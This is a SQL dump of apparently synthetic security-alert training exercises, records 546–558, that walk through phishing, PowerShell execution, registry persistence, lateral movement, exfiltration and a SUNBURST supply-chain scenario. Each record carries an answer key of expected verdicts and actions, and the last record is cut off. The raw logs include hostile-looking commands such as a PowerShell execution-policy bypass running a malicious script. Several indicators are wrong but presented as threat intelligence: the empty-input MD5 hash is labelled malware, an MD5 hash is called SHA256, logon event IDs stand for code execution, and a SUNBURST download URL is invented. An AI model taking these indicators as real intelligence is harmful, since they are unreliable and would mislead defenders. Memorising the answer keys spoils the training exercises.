(546, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious attachment was detected targeting key personnel within the organization. The email originated from a known malicious IP address and contained a file with a suspicious hash linked to advanced persistent threat (APT) activities.', 'Initial Access', 'T1566.001', 1, 'new', 34, '{\"timestamp\":\"2023-10-15T08:42:00Z\",\"email_subject\":\"Urgent: Review the Attached Document\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"j.doe@organization.com\",\"attachment_name\":\"Invoice_October2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_email\":\"finance@truste-partners.com\",\"recipient_ip\":\"192.168.1.15\"}', '2026-01-07 22:33:18', '2026-01-11 01:38:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to document-based malware used in spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance@truste-partners.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address not recognized and associated with recent phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(547, 'Unauthorized Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR) System', 'Upon opening the attachment, a sophisticated malware payload is executed, initiating the deployment of espionage modules.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"4625\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"victim-machine.local\",\"user\":{\"domain\":\"victim-domain\",\"name\":\"john.doe\",\"full_name\":\"John Doe\"},\"process\":{\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"name\":\"malicious_script.ps1\",\"path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution detected.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User employed within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(548, 'Malware Persistence Mechanism Activated', 'high', 'System Registry Logs', 'The malware establishes persistence by modifying registry entries, allowing it to survive system reboots and maintain a foothold within the network. The registry key associated with the malware was altered to execute the malicious binary during startup.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"compromised-host.local\",\"user\":\"john.doe\",\"registry_change\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"MaliciousStartup\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\evil.exe\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with APT actors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to perform registry changes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(549, 'Anomalous Network Activity Detected', 'high', 'Network Traffic Analysis', 'Advanced lateral movement activity detected, involving Bluetooth sniffing to map and infiltrate additional devices within the local network. The malware is expanding its reach by targeting vulnerable hosts using identified Bluetooth connections.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"NT-4567\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.25\",\"external_attacker_ip\":\"203.0.113.45\",\"filename\":\"BlueSniff_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"internal_user\",\"bluetooth_device\":\"00:1A:7D:DA:71:11\",\"event_type\":\"lateral_movement\",\"protocol\":\"Bluetooth\",\"description\":\"Detected suspicious Bluetooth activity attempting to discover and access local devices.\",\"action\":\"attempted lateral movement\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in lateral movement attacks\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"BlueSniff_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for Bluetooth sniffing and lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(550, 'Sensitive Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Logs', 'The malware has initiated a covert data exfiltration process, leveraging screen capture and audio recording modules to gather intelligence. This activity was detected as sensitive files were being transmitted to an external command and control server.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:32:56Z\",\"event_id\":\"DLP-EXFIL-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.42\",\"file_name\":\"confidential_project.pptx\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"user\":\"jdoe\",\"process_name\":\"malware_exfil.exe\",\"process_hash\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"detection_method\":\"Screen Capture and Audio Recording Modules\"}', '2026-01-07 22:33:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware executable.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_project.pptx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention\",\"verdict\":\"sensitive\",\"details\":\"File tagged as containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(551, 'Suspicious Initial Access Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting an engineer\'s workstation. The email contains a malicious attachment likely aimed at compromising the system.', 'Spear Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:23Z\",\"email_id\":\"12345abcde\",\"subject\":\"Project Timeline Update\",\"sender\":\"john.doe@trustedsource.com\",\"recipient\":\"engineer@targetcompany.com\",\"attachment_name\":\"Project_Timeline_Update.docx\",\"attachment_hash\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"action\":\"Delivered\",\"malware_detected\":true,\"malware_name\":\"APT_Equation_Backdoor\"}', '2026-01-07 22:35:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineer\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT_Equation_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Project_Timeline_Update.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Document contains macros that execute malicious code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(552, 'Malicious Code Execution Alert', 'high', 'Endpoint Detection and Response', 'A malicious payload was executed on a compromised system which installs a rootkit, preparing for the next phase of the attack.', 'Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"process_name\":\"cmd.exe\",\"process_command_line\":\"cmd.exe /c C:\\\\Windows\\\\System32\\\\malicious_payload.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_payload.exe\",\"action\":\"Executed\",\"severity\":\"high\",\"description\":\"Malicious payload executed on endpoint\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malware file associated with known attack vectors\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash identified as malicious by multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(553, 'Rootkit Establishes Persistence', 'high', 'System Registry and Scheduled Tasks', 'A rootkit has been detected establishing persistence on the compromised system. It has modified system registry keys and created scheduled tasks to ensure its presence even after system reboots. The rootkit utilizes known persistence techniques to maintain long-term access.', 'Persistence Mechanism', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"compromised-machine.local\",\"user\":\"j.doe\",\"ip_address\":\"10.0.2.15\"},\"registry_changes\":[{\"key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"maliciousStartup\",\"data\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\"}],\"scheduled_tasks\":[{\"task_name\":\"UpdateService\",\"action\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\",\"trigger\":\"Logon\"}],\"network\":{\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with rootkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(554, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using dumped credentials, the attacker moves laterally through the network, targeting systems connected to industrial control networks.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"SMB\",\"username\":\"admin_jdoe\",\"filename\":\"credentials.dmp\",\"hash\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"action\":\"Successful Login\",\"log_id\":\"123456789\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the target system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid network administrator account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File associated with credential dumping activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(555, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention', 'A data exfiltration attempt was detected involving critical industrial control system information. The attacker utilized a known malware to transfer files to an external IP address.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:55:32Z\",\"event_id\":\"DLP-2023-1025-0001\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"filename\":\"ICS_critical_data.zip\",\"action\":\"block\",\"protocol\":\"HTTPS\",\"outcome\":\"success\",\"description\":\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\"}', '2026-01-07 22:35:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with known exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_critical_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of targeted ICS data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised to facilitate data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(556, 'Initial Access via Compromised SolarWinds Update', 'critical', 'Network Traffic Logs', 'APT29 gains initial access by compromising the SolarWinds Orion software update, distributing the SUNBURST backdoor to numerous high-profile targets. Anomalous network traffic detected from an internal server communicating with a known malicious external IP associated with the SUNBURST backdoor.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.100.87.55\",\"protocol\":\"HTTPS\",\"src_port\":443,\"dest_port\":443,\"http_request\":{\"url\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"method\":\"GET\"},\"file_hash\":\"b91ce2fa41029f6955bff20079468448\",\"user_agent\":\"SolarWindsOrion/2020.2.1\",\"internal_username\":\"admin\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server identified as part of the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with SUNBURST backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to SUNBURST.dll known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL distributing SUNBURST backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(557, 'SUNBURST Backdoor Activation', 'critical', 'Endpoint Detection Systems', 'Upon successful update, the SUNBURST backdoor is activated, allowing APT29 to remotely control the infected systems.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4521\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"hash\":\"b91ce2fa41029f6955bff20079468448\",\"user\":\"jdoe\",\"process\":\"orion.exe\",\"action\":\"execution\",\"details\":\"The SolarWinds.Orion.Core.BusinessLayer.dll file was executed, activating the SUNBURST backdoor.\",\"protocol\":\"TCP\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with SUNBURST malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File involved in SUNBURST backdoor activation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(558, 'Establishing Persistence with SUNBURST', 'high', 'System Registry Changes', 'APT29 is leveraging the SUNBURST backdoor to modify system registry settings, ensuring long-term access to the compromised networks.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"SunburstPersistence\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"hash\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Program Files\\\\SolarWinds\\\\Orion\\\\Sunburst.dll\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT29 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the SUNBURST backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sunburst.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with SUNBURST malware used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 